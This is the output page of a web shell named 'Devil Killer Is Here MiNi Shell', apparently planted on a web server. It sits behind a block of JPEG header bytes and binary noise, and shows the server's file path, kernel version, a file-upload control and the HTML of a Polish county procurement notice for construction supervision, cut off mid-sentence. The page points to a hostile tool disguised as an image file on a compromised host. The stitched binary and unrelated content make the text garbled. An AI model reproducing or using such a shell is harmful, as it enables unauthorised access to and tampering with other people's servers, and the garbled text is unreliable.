JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240823/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240823/0046956201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Nadzór inwestorski nad robotami budowlanymi realizowanymi w zakresie obiektów kubaturowych Powiatu Jarosławskiego położonych na terenie miasta Jarosławia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT JAROSŁAWSKI</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Starostwo Powiatowe w Jarosławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900306</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Pawła II 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jarosław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">a.kocyla@powiat.jaroslaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.jaroslawski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Nadzór inwestorski nad robotami budowlanymi realizowanymi w zakresie obiektów kubaturowych Powiatu Jarosławskiego położonych na terenie miasta Jarosławia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d068d5d3-a0f6-4393-bbf4-617000a223df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00469562</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00047784/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Nadzór nad robotami budowlanymi realizowanymi w zakresie obiektów kubaturowych Powiatu Jarosławskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Część Nr 2 zamówienia w ramach: Umowy nr KPO/22/1/BCU/U/0028 z dnia 08. 08. 2023 r. zawartej w ramach konkursu: „Utworzenie i wsparcie funkcjonowania 120 branżowych centrów umiejętności (BCU), realizujących koncepcję centrów doskonałości zawodowej (CoVEs).” Projekt finansowany z Unii Europejskiej w ramach Krajowego Planu Odbudowy Komponent A „Odporność i konkurencyjność gospodarki” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_jaroslawski/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiat_jaroslawski/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">:<br/>1.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl, na stronie internetowej pod adresem: https://platformazakupowa.pl/pn/powiat_jaroslawski/proceedings.<br/>2.	Korzystanie z platformy jest bezpłatne.<br/>3.	Ofertę, oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, przedmiotowe środki dowodowe (jeśli są wymagane),podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, oraz zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym, w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne lub podpisem osobistym, w rozumieniu ustawy z dnia 6 sierpnia 2010 r. o dowodach osobistych.<br/>4.	W sytuacjach awaryjnych, np. w przypadku awarii platformy, Zamawiający i Wykonawcy mogą komunikować się za pomocą poczty elektronicznej Zamawiającego pod adresem: a.kocyla@powiat.jaroslaw.pl.<br/>5.	Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl.<br/>6.	Wykonawca ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>7.	Zgodnie Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2)	komputer klasy PC lub MAC o konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje;<br/>3)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.;<br/>4)	włączona obsługa JavaScript;<br/>5)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>6)	platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8;<br/>7)	oznaczenie czasu odbioru danych przez platformę zakupową platformazakupowa.pl stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8.	UWAGA: pliki przesyłane Zamawiającemu powinny odpowiadać formatom określonym w rozporządzeniu Rady Ministrów z dnia 21 maja 2024 r. w sprawie krajowych ram interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. Zamawiający zaleca (rekomenduje) używanie formatów plików: .pdf, .doc, .docx, .rtf, .odt, .jpg (.jpeg), a w szczególności formatu .pdf. Do kompresji plików Zamawiający zaleca używanie formatów .zip lub .7z.<br/>9.	Dokumenty złożone w plikach rar .gif .bmp .numbers .pages zostaną uznane za złożone nieskutecznie.<br/>10.	Wymagania techniczne i organizacyjne opisane zostały w Regulaminie platformazakupowa.pl, dostępnym na stronie: https://platformazakupowa.pl/strona/1-regulamin.<br/>11.	Wykonawca, przystępując do postępowania: akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej https://platformazakupowa.pl/strona/1-regulamin.<br/>12.	Instrukcje korzystania z platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie: https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">:<br/>Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04. 05. 2016, str. 1), zwanym dalej „RODO”, Zamawiający informuje, że: <br/>1)	Administratorem Pani/Pana danych osobowych jest: Starosta Jarosławski z siedzibą w Jarosławiu przy ul. Jana Pawła II 17, telefon kontaktowy: 16 624 62 13, adres poczty elektronicznej (e-mail): sekretariat@starostwo.jaroslaw.pl; <br/>2)	w imieniu Administratora nadzoruje sferę przetwarzania danych osobowych Inspektor Ochrony Danych, kontakt z Inspektorem Ochrony Danych możliwy jest pod adresem siedziby Administratora, jak również pod numerem telefonu 16 624 62 27 oraz adresem poczty elektronicznej: iod@powiat.jaroslaw.pl; <br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b i c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym oraz zawarcia i realizacji umowy z Administratorem; <br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, zwanej dalej „ustawą Pzp”; <br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, jak również okres przechowywania, na podstawie obowiązujących przepisów prawa może zostać wydłużony w przypadku, gdy dane będą przetwarzane do celów archiwalnych w interesie publicznym; <br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego, konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; <br/>8)	posiada Pani/Pan: <br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, <br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, <br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO, <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">:<br/>Zgodnie z treścią Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04. 05. 2016, str. 1), zwanym dalej „RODO”, nie przysługuje Pani/Panu: <br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, <br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.272.28.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są usługi polegające na pełnieniu obowiązków inspektora nadzoru budowlanego w ramach nadzoru inwestorskiego w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2024 r. poz. 725 z późn. zm.) nad robotami budowlanymi wykonywanymi w zakresie obiektów kubaturowych Powiatu Jarosławskiego, zlokalizowanych na terenie miasta Jarosławia.<br/>2.	Przedmiot niniejszego zamówienia został podzielony na 2 Części realizowane pod nazwami:<br/>1)	Część nr 1: ,,Nadzór inwestorski nad realizacją robót budowlanych obejmujących: „Budowę budynku sali gimnastycznej z pomieszczeniami dydaktycznymi i łącznika do budynku szkoły na działkach nr ewid. gr. 2426, 2428, 2417, jedn. ewid. 180401_1, Miasto Jarosław”;<br/>2)	Część nr 2: ,,Nadzór inwestorski nad realizacją robót budowlanych obejmujących: „Rozbudowę i przebudowę budynku dydaktycznego Zespołu Szkół Technicznych i Ogólnokształcących w Jarosławiu w ramach zadania inwestycyjnego pod nazwą Utworzenie Branżowego Centrum Umiejętności”.<br/>3.	Część nr 1 zamówienia pod nazwą: ,,Nadzór inwestorski nad realizacją robót budowlanych obejmujących: „Budowę budynku sali gimnastycznej z pomieszczeniami dydaktycznymi i łącznika do budynku szkoły na działkach nr ewid. gr. 2426, 2428, 2417, jedn. ewid. 180401_1, Miasto Jarosław” swoim zakresem obejmuje nadzór nad robotami budowlanymi, <br/>w skład których wchodzą:<br/>2)	W zakresie budowy budynku Sali gimnastycznej:<br/>a)	wykonanie robót ziemnych tj. usunięcie warstwy humusu, wykonanie wykopów i przekopów wraz z zasypywaniem wykopów oraz zagęszczeniem odpowiednimi warstwami,<br/>b)	wykonanie zbrojenia konstrukcji żelbetowych,<br/>c)	wykonanie fundamentów tj. podkład z chudego betonu, ławy fundamentowe, stopy fundamentowe oraz ściany fundamentowe,<br/>d)	wykonanie zbrojenia oraz betonowania elementów konstrukcyjnych budynku tj. płyt żelbetowych, słupów żelbetowych, podciągów, belek żelbetowych oraz schodów żelbetowych,<br/>e)	wykonanie wypełnienia i poszycia ścian zewnętrznych z płyt warstwowych,<br/>f)	wykonanie ścian wewnętrznych z bloczków z betonu komórkowego oraz płyt gipsowo kartonowych,<br/>g)	wykonanie konstrukcji dachu z drewna klejonego,<br/>h)	wykonanie pokrycia dachu płytami warstwowymi typu sandwich wraz z niezbędnymi obróbkami blacharskimi,<br/>i)	wykonanie stolarki okiennej i drzwiowej,<br/>j)	wykonanie tynków i posadzek,<br/>k)	wykonanie schodów zewnętrznych i podjazdu dla osób niepełnosprawnych,<br/>l)	wykonanie instalacji wewnętrznych elektrycznych, instalacji oddymiania, instalacji odgromowej i ekwipotencjalnej, instalacji nagłośnienia oraz pomiarów,<br/>m)	wykonanie instalacji sanitarnych tj. ciepła technologicznego i centralnego ogrzewania,<br/>n)	wykonanie kotłowni gazowej z instalacjami,<br/>o)	wykonanie instalacji wentylacji, instalacji wod-kan.;<br/>3)	W zakresie budowy łącznika do budynku szkoły publicznej:<br/>a)	wykonanie robót ziemnych tj. usunięcie warstwy humusu, wykonanie wykopów i przekopów wraz z zasypywaniem wykopów oraz zagęszczeniem odpowiednimi warstwami,<br/>b)	wykonanie zbrojenia konstrukcji żelbetowych,<br/>c)	wykonanie fundamentów tj. podkład z chudego betonu, ławy fundamentowe, stopy fundamentowe oraz ściany fundamentowe,<br/>d)	wykonanie zbrojenia oraz betonowania elementów konstrukcyjnych budynku tj. płyt żelbetowych, słupów żelbetowych, podciągów, belek żelbetowych oraz schodów żelbetowych,<br/>e)	wykonanie stropodachu i dachu,<br/>f)	wykonanie stolarki okiennej i drzwiowej,<br/>g)	przebudowa uzbrojenia terenu kolidującego z projektowanym budynkiem,<br/>h)	prace w drogach i placach.<br/>4.	Pełnienie nadzoru obejmować będzie następujące branże:<br/>1)	konstrukcyjno-budowlaną,<br/>2)	sanitarną tj. instalacyjną w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,<br/>3)	elektryczną tj. instalacyjną w zakresie sieci, instalacji i urządzeń elektrycznych <br/>i elektroenergetycznych.<br/>5.	Świadczenie usług Wykonawca zapewni przy pomocy zespołu Inspektorów nadzoru inwestorskiego w wyżej wymienionych branżach, przy czym inspektor nadzoru inwestorskiego branży konstrukcyjno-budowlanej będzie pełnił funkcję Koordynatora zespołu.<br/>6.	Szczegółowy opis przedmiotu zamówienia tj. zakresu robót budowlanych podlegających nadzorowi w ramach Część nr 1 zamówienia określa ,,Opis przedmiotu zamówienia”, stanowiący Załącznik Nr 1.1 do SWZ.<br/>7.	Do obowiązków Wykonawcy / Inspektor nadzoru inwestorskiego w ramach pełnionego nadzoru będą należeć w szczególności: <br/>1)	reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli nad zgodnością realizacji robót z dokumentacją projektowo – techniczną, umową zawartą z Wykonawcą robót, przepisami BHP, obowiązującymi normami technicznymi oraz zasadami wiedzy technicznej i sztuki budowlanej;<br/>2)	liczba pobytów Inspektorów nadzoru w miejscu prowadzenia prac musi zapewnić prawidłowy i skuteczny nadzór nad przebiegiem robót i wynikać będzie z bieżących potrzeb. Inspektor nadzoru inwestorskiego branży konstrukcyjno-budowlanej zobowiązuje się do wizyt na budowie minimum 2 razy w tygodniu wraz z udokumentowaniem wizyty niezbędnym wpisem w dzienniku budowy;<br/>3)	sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów, a w szczególności zapobieganie stosowania wyrobów wadliwych i niedopuszczonych do obrotu i stosowania <br/>w budownictwie;<br/>4)	sprawdzenie i odbiór w imieniu Zamawiającego wszystkich robót budowlanych, w tym ulegających zakryciu lub zanikowi, uczestniczenie w próbach technicznych instalacji, urządzeń technicznych i przewodów oraz dokonywanie odbioru gotowych elementów budowli i przekazanie ich do użytkowania;<br/>5)	uczestniczenie w komisjach, spotkaniach i naradach budowy dotyczących realizacji przedmiotowej inwestycji;<br/>6)	sprawdzenie i potwierdzenie faktycznie wykonanych robót, usunięcie wad oraz kontrolowanie rozliczeń budowy, zatwierdzania do zapłaty rachunków i faktur przedłożonych przez Wykonawcę robót budowlanych;<br/>7)	kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót;<br/>8)	w przypadku rozliczania wykonania robót budowlanych podlegających nadzorowi w ramach niniejszej umowy Inspektorzy nadzoru zobowiązani są w terminie 14 dni od dnia otrzymania od Wykonawcy robót budowlanych podlegających nadzorowi w ramach niniejszej umowy, zestawienia wykonanych robót budowlanych/prac podlegających odbiorowi częściowemu wraz z rozliczeniem ich wartości, sprawdzić zestawienie wartości wykonanych robót budowlanych/prac, rozliczyć ich wartości, dokonać ewentualnych korekt przedłożonego zestawienia, potwierdzić kwoty należnych do zapłaty Wykonawcy, a następnie dokonać odbioru robót budowlanych/prac podlegających odbiorowi częściowemu zgodnie z otrzymanym zestawieniem;<br/>9)	dokonanie w terminie ustalonym w umowie z Wykonawcą robót budowlanych odbioru końcowego robót budowlanych podlegających nadzorowi w ramach niniejszej umowy, <br/>z którego sporządzi stosowny protokół i przekaże Zamawiającemu;<br/>10)	skompletowanie i przekazanie Zamawiającemu dokumentów pozwalających na ocenę prawidłowego wykonania przedmiotu odbioru, a w szczególności przekazanie:<br/>•	dziennika budowy, <br/>•	dokumentacji powykonawczej,<br/>•	protokołów technicznych i częściowych odbioru robót budowlanych,<br/>•	protokołów badań,<br/>•	gwarancji,<br/>•	aprobat technicznych,<br/>•	atestów i certyfikatów jakości,<br/>•	deklaracji zgodności z PN,<br/>•	kart materiałowych,<br/>•	dokumentacji technicznej z naniesionymi zmianami dokonywanymi w toku wykonania przedmiotu umowy, jeżeli miały miejsce,<br/>•	inwentaryzacji geodezyjnej wykonanej przez uprawnionego geodetę;<br/>11)	uczestniczenie w komisjach usterkowych poodbiorowych oraz w przeglądach w okresie rękojmi i gwarancji na prace wykonywane przez wykonawcę robót budowlanych tj. okres 60 miesięcy liczonych od dnia odbioru końcowego przez Zamawiającego robót objętych nadzorem inwestorskim w ramach niniejszej umowy, na zawiadomienie Zamawiającego, potwierdzenia usunięcia wad i usterek w okresie gwarancji i rękojmi, uczestnictwa w odbiorze pogwarancyjnym inwestycji, bez dodatkowego wynagrodzenia;<br/>12)	Inspektor będzie zobowiązany do wykonywania czynności w imieniu Zamawiającego w ramach nadzoru inwestorskiego w okresie gwarancji, w terminach wyznaczonych przez Zamawiającego, a w szczególności w przypadku zgłoszenia usterek spowodowanych 